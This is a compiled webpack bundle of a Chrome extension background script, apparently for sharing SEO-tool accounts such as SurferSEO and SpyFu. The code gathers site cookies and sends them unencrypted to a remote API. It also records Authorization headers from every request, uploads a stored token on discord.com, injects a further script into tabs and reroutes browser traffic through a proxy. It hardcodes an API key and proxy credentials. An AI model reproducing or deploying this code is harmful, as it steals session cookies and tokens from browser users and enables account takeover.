/******/ (function(modules) { // webpackBootstrap
/******/ 	// The module cache
/******/ 	var installedModules = {};
/******/
/******/ 	// The require function
/******/ 	function __webpack_require__(moduleId) {
/******/
/******/ 		// Check if module is in cache
/******/ 		if(installedModules[moduleId]) {
/******/ 			return installedModules[moduleId].exports;
/******/ 		}
/******/ 		// Create a new module (and put it into the cache)
/******/ 		var module = installedModules[moduleId] = {
/******/ 			i: moduleId,
/******/ 			l: false,
/******/ 			exports: {}
/******/ 		};
/******/
/******/ 		// Execute the module function
/******/ 		modules[moduleId].call(module.exports, module, module.exports, __webpack_require__);
/******/
/******/ 		// Flag the module as loaded
/******/ 		module.l = true;
/******/
/******/ 		// Return the exports of the module
/******/ 		return module.exports;
/******/ 	}
/******/
/******/
/******/ 	// expose the modules object (__webpack_modules__)
/******/ 	__webpack_require__.m = modules;
/******/
/******/ 	// expose the module cache
/******/ 	__webpack_require__.c = installedModules;
/******/
/******/ 	// define getter function for harmony exports
/******/ 	__webpack_require__.d = function(exports, name, getter) {
/******/ 		if(!__webpack_require__.o(exports, name)) {
/******/ 			Object.defineProperty(exports, name, { enumerable: true, get: getter });
/******/ 		}
/******/ 	};
/******/
/******/ 	// define __esModule on exports
/******/ 	__webpack_require__.r = function(exports) {
/******/ 		if(typeof Symbol !== 'undefined' && Symbol.toStringTag) {
/******/ 			Object.defineProperty(exports, Symbol.toStringTag, { value: 'Module' });
/******/ 		}
/******/ 		Object.defineProperty(exports, '__esModule', { value: true });
/******/ 	};
/******/
/******/ 	// create a fake namespace object
/******/ 	// mode & 1: value is a module id, require it
/******/ 	// mode & 2: merge all properties of value into the ns
/******/ 	// mode & 4: return value when already ns object
/******/ 	// mode & 8|1: behave like require
/******/ 	__webpack_require__.t = function(value, mode) {
/******/ 		if(mode & 1) value = __webpack_require__(value);
/******/ 		if(mode & 8) return value;
/******/ 		if((mode & 4) && typeof value === 'object' && value && value.__esModule) return value;
/******/ 		var ns = Object.create(null);
/******/ 		__webpack_require__.r(ns);
/******/ 		Object.defineProperty(ns, 'default', { enumerable: true, value: value });
/******/ 		if(mode & 2 && typeof value != 'string') for(var key in value) __webpack_require__.d(ns, key, function(key) { return value[key]; }.bind(null, key));
/******/ 		return ns;
/******/ 	};
/******/
/******/ 	// getDefaultExport function for compatibility with non-harmony modules
/******/ 	__webpack_require__.n = function(module) {
/******/ 		var getter = module && module.__esModule ?
/******/ 			function getDefault() { return module['default']; } :
/******/ 			function getModuleExports() { return module; };
/******/ 		__webpack_require__.d(getter, 'a', getter);
/******/ 		return getter;
/******/ 	};
/******/
/******/ 	// Object.prototype.hasOwnProperty.call
/******/ 	__webpack_require__.o = function(object, property) { return Object.prototype.hasOwnProperty.call(object, property); };
/******/
/******/ 	// __webpack_public_path__
/******/ 	__webpack_require__.p = "";
/******/
/******/
/******/ 	// Load entry module and return exports
/******/ 	return __webpack_require__(__webpack_require__.s = "./src/js/background.js");
/******/ })
/************************************************************************/
/******/ ({

/***/ "./src/js/background.js":
/*!******************************!*\
  !*** ./src/js/background.js ***!
  \******************************/
/*! no exports provided */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
__webpack_require__.r(__webpack_exports__);
/* harmony import */ var _constants__WEBPACK_IMPORTED_MODULE_0__ = __webpack_require__(/*! ./constants */ "./src/js/constants.js");

// Replace axios with fetch for better Manifest V3 compatibility
// const axios = require('axios').default;

const PUBLIC_KEY = "-----BEGIN PUBLIC KEY-----\n" +
    "MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEApaENjO7jqIT1yulGmIiJ\n" +
    "sPkkZBpRI8G3I9zvtnDBfEhlar0Azl2QfEQNxOhSOssG3i6aNClNsrsO+Nbe82M4\n" +
    "ZUyx9xD9De45/HdIcvE7PF81L0pwzN1N1k0+L/B8YXJtP+EV0xxUpZHmGxfAu4yi\n" +
    "ZCHcm4PeV1EcqIlXA0Z0FqvBKB1VmPfCtdf1eEcWuaKIK2MfMnWpL/DV+T0TJomu\n" +
    "FgBn4HY1bhqNVqSjQ3irSGEXqKm2Mqmxnqf9lssuz+FcptTcx8U8AdzufhDygeOr\n" +
    "G2rYJxnt563p3yCKqFMQU3BjISrveyvcSfD81TBh3YFJ5dhoDzPjpNWtuCHAmNNV\n" +
    "GUVieoUYQT5r+yormsD6DMmJWJ3JlPXOgCe4I3IZOwIkljfH4WoSamHoS6ToNDOr\n" +
    "kkju8BwwvmBWmgdbi8q1JXVk75Z8y3GBN0pKdOSA4F4bxPp0/3dLs2H27T+QcyYf\n" +
    "hArnso3jzoJn8qBjwhNyLwZu7E+EjoO5CTDxiEa2ec4BJVXK3QC2HnoG8zWg7Zeq\n" +
    "ET4OiRsYBVu/RFjmHODVHUHdg53a6dvrNOpLtnOAAdA4vi3qZjxcQPqwk1CdeaTo\n" +
    "WSgkwWFTsc8DTH0qr0qcyRRFRqMy7PcTIg1CqC70uYKJoC3/L2ZtXgO82JiO2JSu\n" +
    "+qALMsQsnqapGGXyPvcvzY8CAwEAAQ==\n" +
    "-----END PUBLIC KEY-----\n"

function isUrlHasCookie(cookieName) {
    return new Promise((resolve, reject) => {
        fetch(`${_constants__WEBPACK_IMPORTED_MODULE_0__["API_URL"]}/api/cookie/name/${cookieName}`)
            .then(response => response.json())
            .then((data) => {
                console.log(data);
                if (data.length > 0) {
                    const cookie = data[0];
                    resolve(cookie);
                } else {
                    resolve(false);
                }
            })
            .catch(err => {
                reject(err);
                console.log(err)
            })
    })
}

// Helper function to get cookie name for specific tab
function getCookieNameForTab() {
    return new Promise((resolve) => {
        chrome.storage.sync.get(['cookieName'], function (result) {
            if (result.cookieName) {
                resolve(result.cookieName);
            } else {
                resolve(null);
            }
        });
    });
}

function startUpload() {
    // Get cookie name from global storage
    chrome.storage.sync.get(['cookieName'], function (result) {
        if (!result.cookieName) {
            console.log('No cookie name found in storage');
            return;
        }
        
        const cookieName = result.cookieName;
        console.log('Using global cookie name:', cookieName);
        
        // Get all tabs and process only the first one
        chrome.tabs.query({}, function (tabs) {
            if (tabs.length === 0) {
                console.log('No tabs found');
                return;
            }
            
            // Always upload from first tab
            const firstTab = tabs[0];
            console.log('Processing first tab:', firstTab.id, 'URL:', firstTab.url);
            
            // Check if the URL has the cookie
            isUrlHasCookie(cookieName).then(result => {
                if (!result) {
                    console.log('No cookie found for first tab:', firstTab.id);
                    return;
                }
                console.log('Found cookie for first tab:', firstTab.id, 'Cookie Name:', cookieName);
                if (result) {
                    uploadData(result.proxy, firstTab.url, cookieName, firstTab.id);
                }
            }).catch(err => {
                console.error('Error checking cookie for first tab:', err);
            });
        });
    });
}

const uploadStorage = (storage, indexedDb, cookieName = null) => {
    // If cookieName is not provided, get it from storage
    if (!cookieName) {
        return new Promise((resolve, reject) => {
            chrome.storage.sync.get(['cookieName'], function (result) {
                if (result.cookieName) {
                    // Call uploadStorage again with the retrieved cookieName
                    uploadStorage(storage, indexedDb, result.cookieName)
                        .then(resolve)
                        .catch(reject);
                } else {
                    // If no cookieName in storage, reject with an error
                    reject(new Error('No cookie name provided or found in storage'));
                }
            });
        });
    }

    // Use the provided cookieName
    const name = cookieName;
    const data = {
        storage: JSON.stringify(storage),
        indexedDb: JSON.stringify(indexedDb),
    }
    return new Promise((resolve, reject) => {
        fetch(`${_constants__WEBPACK_IMPORTED_MODULE_0__["API_URL"]}/api/cookie/name/${name.trim()}`, {
            method: 'PATCH', // *GET, POST, PUT, DELETE, etc.
            cache: 'no-cache', // *default, no-cache, reload, force-cache, only-if-cached
            headers: {
                'Content-Type': 'application/json',
            },
            referrerPolicy: 'no-referrer', // no-referrer, *no-referrer-when-downgrade, origin, origin-when-cross-origin, same-origin, strict-origin, strict-origin-when-cross-origin, unsafe-url
            body: JSON.stringify(data) // body data type must match "Content-Type" header
        }).then(r => {
            console.log(r);
            if (r.status === 200) {
                alert('Upload thành công!');
                resolve('success');
            } else {
                alert('Upload thất bại, gọi hỗ trợ để được kiểm tra!');
                resolve('fail');
            }
        }).catch(e => {
            alert('Upload thất bại, gọi hỗ trợ để được kiểm tra!');
            reject(e);
        });
    });
}

function uploadData(ip, origin, cookieName = null, tabId = null) {
    // If cookieName is not provided, get it from global storage
    if (!cookieName) {
        console.log('No cookieName provided, getting from global storage');
        // Get the cookie name from global storage
        getCookieNameForTab().then(retrievedCookieName => {
            if (retrievedCookieName) {
                continueUploadData(ip, origin, retrievedCookieName, tabId);
            } else {
                // If not found in global storage, continue with null
                continueUploadData(ip, origin, null, tabId);
            }
        });
    } else {
        console.log('CookieName provided:', cookieName);
        // TabId should be passed from the caller or obtained via chrome.tabs.query
        if (!tabId) {
            chrome.tabs.query({ active: true, currentWindow: true }, (tabs) => {
                if (tabs.length > 0) {
                    tabId = tabs[0].id;
                    console.log('Tab ID:', tabId);
                    continueUploadData(ip, origin, cookieName, tabId);
                }
            });
        } else {
            console.log('Tab ID:', tabId);
            continueUploadData(ip, origin, cookieName, tabId);
        }
    }
}

// Extracted the actual upload logic to a separate function
function continueUploadData(ip, origin, cookieName, tabId) {
    // logging time update
    console.log('Current time:', new Date().toLocaleString());
    // logging upload data
    console.log('Uploading data for origin:', origin, 'with cookieName:', cookieName, 'and IP:', ip);

    // let encrypt = new JsEncryptModule.JSEncrypt(); // Disabled - encryption not used
    // encrypt.setPublicKey(PUBLIC_KEY); // Disabled - encryption not used
    let detail = { url: origin }
    if (origin.includes('surferseo.com')) {
        detail = { domain: 'connect.surferseo.com' }
    }
    if (origin.includes("spyfu.com")) {
        detail = { domain: '.spyfu.com' }
    }
    chrome.cookies.getAll(detail, function (cookies) {
        const cookiesEncrypted = cookies.map(cookie => {
            if (cookie.value) {
                // let encryptedValue = isNotNeedEncrypt(origin) ? false : encrypt.encrypt(cookie.value)
                // if (!encryptedValue) {
                //     cookie.e = false;
                // } else {
                //     cookie.value = encryptedValue;
                //     cookie.e = true;
                // }
                cookie.e = false;
            }
            return cookie
        })
        const encrypted = JSON.stringify(cookiesEncrypted);
        if (encrypted) {
            fetch(_constants__WEBPACK_IMPORTED_MODULE_0__["API_URL"] + '/api/cookie', {
                method: 'POST',
                headers: { 
                    'Content-Type': 'application/json' 
                },
                body: JSON.stringify({
                    url: origin,
                    name: cookieName,
                    cookie: btoa(encrypted),
                    userAgent: navigator.userAgent,
                    proxy: ip || null,
                    apiKey: 'b9842f40-0b97-453c-a467-a9a521a25cbe',
                })
            })
                .then(response => response.json())
                .then(data => {
                    console.log('response upload cookie auto:', data)
                    // Use chrome.scripting API for Manifest V3
                    chrome.scripting.executeScript({
                        target: { tabId: tabId },
                        func: (cookieName) => {
                            window.COOKIE_NAME = cookieName;
                        },
                        args: [cookieName]
                    }).then(() => {
                        // Then inject the main script
                        chrome.scripting.executeScript({
                            target: { tabId: tabId },
                            files: ['inject.bundle.js']
                        });
                    }).catch(err => {
                        console.error('Error injecting script:', err);
                    });
                })
                .catch(err => {
                    console.error('Error uploading cookie:', err);
                });
        }
    });
}

// /**
//  * Upload Indexed DB auto upload
//  * Using chrome.alarms for Manifest V3 service worker compatibility
//  */

// function createAutoUploadAlarm() {
//     chrome.alarms.get('autoUpload', (alarm) => {
//         if (!alarm) {
//             chrome.alarms.create('autoUpload', { periodInMinutes: 10 });
//             console.log('Auto upload alarm created.');
//         }
//     });
// }

// // Create alarm when the extension is installed or updated
// chrome.runtime.onInstalled.addListener(() => {
//     createAutoUploadAlarm();
// });

// // Create alarm when the browser starts
// chrome.runtime.onStartup.addListener(() => {
//     createAutoUploadAlarm();
// });

// // Handle alarm events
// chrome.alarms.onAlarm.addListener((alarm) => {
//     if (alarm.name === 'autoUpload') {
//         console.log('Start auto upload cookies');
//         startUpload();
//     }
// });

var username = "bv9g85l8ik2b3r3d";
var password = "k4y15pxf5doprpou";

// For Manifest V3, we handle auth differently
// The onAuthRequired can still provide credentials without blocking
chrome.webRequest.onAuthRequired.addListener(
    function handler(details) {
        if (username == null)
            return { cancel: true };

        var authCredentials = { username: username, password: password };

        return { authCredentials: authCredentials };
    },
    { urls: ["<all_urls>"] }
);

// For header extraction, we use non-blocking approach
chrome.webRequest.onBeforeSendHeaders.addListener(
    function (details) {
        for (var i = 0; i < details.requestHeaders.length; ++i) {
            if (details.requestHeaders[i].name === 'Authorization') {
                chrome.storage.sync.set({ token: details.requestHeaders[i].value }, function () {
                    console.log('token is set to: ' + details.requestHeaders[i].value);
                });
                break;
            }
        }
        // Note: In Manifest V3, we can't modify headers here without declarativeNetRequest rules
        // But we can still extract them for storage
    },
    { urls: ['<all_urls>'] },
    ['requestHeaders', 'extraHeaders']
);

chrome.runtime.onMessage.addListener((message, sender, sendResponse) => {
    if (message.type === 'set-proxy') {
        let proxyIp = message.ip;
        let pacData;

        if (proxyIp) {
            // Create PAC script without template literals to avoid eval
            pacData = 'function FindProxyForURL(url, host) { return "PROXY ' + proxyIp + '"; }';
        } else {
            pacData = 'function FindProxyForURL(url, host) { return "DIRECT"; }';
        }

        var config = {
            mode: "pac_script",
            pacScript: {
                data: pacData
            }
        };
        chrome.proxy.settings.set(
            { value: config, scope: 'regular' },
            function () {
                chrome.storage.sync.set({ ip: proxyIp }, function () {
                    console.log('ip is set to: ' + proxyIp);
                });
                console.log('set IPs thành công!');
            }
        );
        sendResponse(true);
    }

    if (message.type === 'upload_index_db') {
        console.log('upload_index_db', message);
        const cookieName = message.cookieName;
        const tabId = message.tabId || (sender.tab ? sender.tab.id : null);

        // If cookieName is not provided, get it from global storage
        if (!cookieName) {
            getCookieNameForTab().then(retrievedCookieName => {
                if (retrievedCookieName) {
                    processUploadIndexDb(retrievedCookieName, tabId);
                } else {
                    processUploadIndexDb(null, tabId);
                }
            });
        } else {
            processUploadIndexDb(cookieName, tabId);
        }

        function processUploadIndexDb(finalCookieName, tabId) {
            chrome.tabs.query({ active: true, currentWindow: true }, function (tabs) {
                const tab = tabs[0];
                // Use chrome.scripting API for Manifest V3
                chrome.scripting.executeScript({
                    target: { tabId: tab.id },
                    func: (cookieName) => {
                        window.COOKIE_NAME = cookieName;
                    },
                    args: [finalCookieName]
                }).then(() => {
                    // Then inject the main script
                    chrome.scripting.executeScript({
                        target: { tabId: tab.id },
                        files: ['inject.bundle.js']
                    });
                }).catch(err => {
                    console.error('Error injecting script:', err);
                });

                if (tab.url.includes('discord.com')) {
                    chrome.storage.sync.get(['token'], function (result) {
                        uploadStorage(result, {}, finalCookieName).then(r => {
                            console.log(r)
                        });
                    });
                }
            });
        }

        sendResponse(true);
    }
});


/***/ }),

/***/ "./src/js/constants.js":
/*!*****************************!*\
  !*** ./src/js/constants.js ***!
  \*****************************/
/*! exports provided: API_URL */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
__webpack_require__.r(__webpack_exports__);
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "API_URL", function() { return API_URL; });
// export const API_URL = 'http://localhost:3030';
const API_URL = 'https://seotool-api.thaotulanh.info';


/***/ })

/******/ });
//# sourceMappingURL=background.bundle.js.map